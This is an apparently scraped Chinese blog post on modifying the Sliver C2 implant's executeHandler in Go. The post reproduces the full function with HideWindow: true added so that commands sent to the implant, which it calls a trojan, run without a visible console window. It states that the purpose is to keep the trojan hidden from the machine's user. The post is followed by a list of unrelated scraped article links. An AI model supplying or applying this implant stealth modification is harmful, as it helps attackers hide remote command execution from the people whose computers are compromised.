向木马发出指令后, 如果是cmd命令会有一个黑窗口一闪而灭, 不利于木马隐藏, 需要将executeHandlerhandlers.go拷贝到handlers_windows.go里,核心代码为 cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}表示隐藏命令弹窗

func executeHandler(data []byte, resp RPCResponse) {

	var (

		err       error

		stdErr    io.Writer

		stdOut    io.Writer

		errWriter *bufio.Writer

		outWriter *bufio.Writer

	)

	execReq := &sliverpb.ExecuteReq{}

	err = proto.Unmarshal(data, execReq)

	if err != nil {

		// {{if .Config.Debug}}

		log.Printf("error decoding message: %v", err)

		// {{end}}

		return

	}

	execResp := &sliverpb.Execute{}

	exePath, err := expandPath(execReq.Path)

	if err != nil {

		execResp.Response = &commonpb.Response{

			Err: fmt.Sprintf("%s", err),

		}

		proto.Marshal(execResp)

		resp(data, err)

		return

	}

	cmd := exec.Command(exePath, execReq.Args...)

	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}

	if execReq.Output {

		stdOutBuff := new(bytes.Buffer)

		stdErrBuff := new(bytes.Buffer)

		stdErr = stdErrBuff

		stdOut = stdOutBuff

		if execReq.Stderr != "" {

			stdErrFile, err := os.Create(execReq.Stderr)

			if err != nil {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

				proto.Marshal(execResp)

				resp(data, err)

				return

			}

			defer stdErrFile.Close()

			errWriter = bufio.NewWriter(stdErrFile)

			stdErr = io.MultiWriter(errWriter, stdErrBuff)

		}

		if execReq.Stdout != "" {

			stdOutFile, err := os.Create(execReq.Stdout)

			if err != nil {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

				proto.Marshal(execResp)

				resp(data, err)

				return

			}

			defer stdOutFile.Close()

			outWriter = bufio.NewWriter(stdOutFile)

			stdOut = io.MultiWriter(outWriter, stdOutBuff)

		}

		cmd.Stdout = stdOut

		cmd.Stderr = stdErr

		err := cmd.Run()

		//{{if .Config.Debug}}

		log.Printf("Exec (%v): %s", err, string(stdOutBuff.String()))

		//{{end}}

		if err != nil {

			// Exit errors are not a failure of the RPC, but of the command.

			if exiterr, ok := err.(*exec.ExitError); ok {

				execResp.Status = uint32(exiterr.ExitCode())

			} else {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

			}

		}

		if errWriter != nil {

			errWriter.Flush()

		}

		if outWriter != nil {

			outWriter.Flush()

		}

		execResp.Stderr = stdErrBuff.Bytes()

		execResp.Stdout = stdOutBuff.Bytes()

		if cmd.Process != nil {

			execResp.Pid = uint32(cmd.Process.Pid)

		}

	} else {

		err = cmd.Start()

		if err != nil {

			execResp.Response = &commonpb.Response{

				Err: fmt.Sprintf("%s", err),

			}

		}

		go func() {

			cmd.Wait()

		}()

		if cmd.Process != nil {

			execResp.Pid = uint32(cmd.Process.Pid)

		}

	}

	data, err = proto.Marshal(execResp)

	resp(data, err)

}

c2工具sliver 执行木马命令后会弹窗一闪而过的更多相关文章

  1. 使用 FileZilla FTP Client连接Vsftpd在执行LIST命令后提示连接超时

    使用 FileZilla FTP Client 连接 Vsftpd在执行LIST命令后提示连接超时. vi /etc/vsftpd/vsftpd.conf 添加: #开启被动模式 pasv_enabl ...

  2. 菜鸟调错(七)——控制台中执行mvn命令后提示‘cmd’不是内部或外部命令

    最近在cmd下使用mvn命令时,在执行完以后总会出现一句“‘cmd’不是内部或外部命令,也不是可执行程序或批处理文件”,如下图: 虽然命令执行成功了,不会有什么影响,但是身为强迫症晚期的我是绝对不能忍 ...

  3. linux执行python命令后permission denied

    linux下执行python后显示被拒绝问题定位: 1.检查下要执行的文件的权限是否存在执行权限,否则执行chmod命令赋予权限: 2.若赋予权限后仍然显示没有权限,检查下执行的python文件是否有 ...

  4. crt执行cat命令后乱码

    cat查看二进制文件后所有命令都乱码执行reset即可恢复

  5. 执行xcopy命令后出现Invalid num of parameters错误的解决办法

    作者:朱金灿 来源:http://blog.csdn.net/clever101 在执行一条批处理命令: xcopy /s /i /y C:\ppt D:\Program doc 开始很纳闷,上网一查 ...

  6. linux执行python命令后没有反应,不打印日志信息

    实际的python执行的软连接是路径是/opt/python2.7/bin/python,而设置的软连接错误如下: 修改该连接,是python指向/opt/python2.7/bin/python, ...

  7. [BAT] 执行xcopy命令后出现Invalid num of parameters错误的解决办法

    如果是Windows下的命令行,对于有空格的文件路径要加引号,对于xcopy命令就是源路径和目标路径都要加引号 xcopy "C:\ppt" "D:\Program do ...

  8. spark on yarn,client模式时,执行spark-submit命令后命令行日志和YARN AM日志

    [root@linux-node1 bin]# ./spark-submit \> --class com.kou.List2Hive \> --master yarn \> --d ...

  9. spark on yarn,cluster模式时,执行spark-submit命令后命令行日志和YARN AM日志

    [root@linux-node1 bin]# ./spark-submit \> --class com.kou.List2Hive \> --master yarn \> --d ...

  10. react+ant design 项目执行yarn run eject 命令后无法启动项目

    如何将内建配置全部暴露? 使用create-react-app结合antd搭建的项目中,项目目录没有该项目所有的内建配置, 1.执行yarn run eject 执行该命令后,运行项目yarn sta ...

随机推荐

  1. [转帖]理解 Linux backlog/somaxconn 内核参数

    引言 在研究IOTDB的时候,启动服务的时候会有个报警. WARN: the value of net.core.somaxconn (=4096) is too small, please set ...

  2. [转帖]MobaXterm激活专业版

      本文思路来自 https://github.com/flygon2018/MobaXterm-keygen 有python 环境 并且不看英文的可以继续往下 不然直接访问这个地址也行. 1.需要一 ...

  3. 【转帖】Linux查看二进制文件:一招制敌(linux二进制查看文件)

    https://www.dbs724.com/146055.html 一招制敌:学会Linux查看二进制文件 在Linux操作系统中,二进制文件是一种常见的文件类型.如果你想深入了解一个二进制文件,可 ...

  4. [转帖]InnoDB表聚集索引层高什么时候发生变化

    导读 本文略长,主要解决以下几个疑问 1.聚集索引里都存储了什么宝贝 2.什么时候索引层高会发生变化 3.预留的1/16空闲空间做什么用的 4.记录被删除后的空间能回收重复利用吗 1.背景信息 1.1 ...

  5. [转帖]VMware ESXi 各版本号对照表

    本博文转自以下链接: VMware ESXi Release and Build Number History | virten.net vSphere ESXi 7.0 Name Patch Dat ...

  6. prometheus告警规则分发服务

    Prometheus告警规则分发服务,根据一致性哈希将规则分发到多个节点,使用多个goroutine处理应用告警,在服务增加时可以增加goroutine,服务减少时降低goroutine数目. 规则下 ...

  7. CS231N Assignment1 SVM 笔记

    svm.ipynb 为SVM实现一个完全矢量化的损失函数 为其解析梯度实现完全矢量化表达式 使用数值梯度检查实现结果 使用验证集调整学习率和正则化 使用 SGD 优化损失函数 可视化最终学习权重 第一 ...

  8. echarts去除坐标轴上的x和y轴

    通过 show:false控制手否显示 <!DOCTYPE html> <html lang="en"> <head> <meta cha ...

  9. elementui出现展开后子菜单宽度多出1px问题

    添加 就可以解决了 .el-menu { border-right-width: 0; } <template> <div class="compen-left-men&q ...

  10. Vant中List列表下拉加载更多

    van-list上只有一层父级元素div,多了可能下拉加载出不来:或者更多 <template> <div class="scholl-declarepage"& ...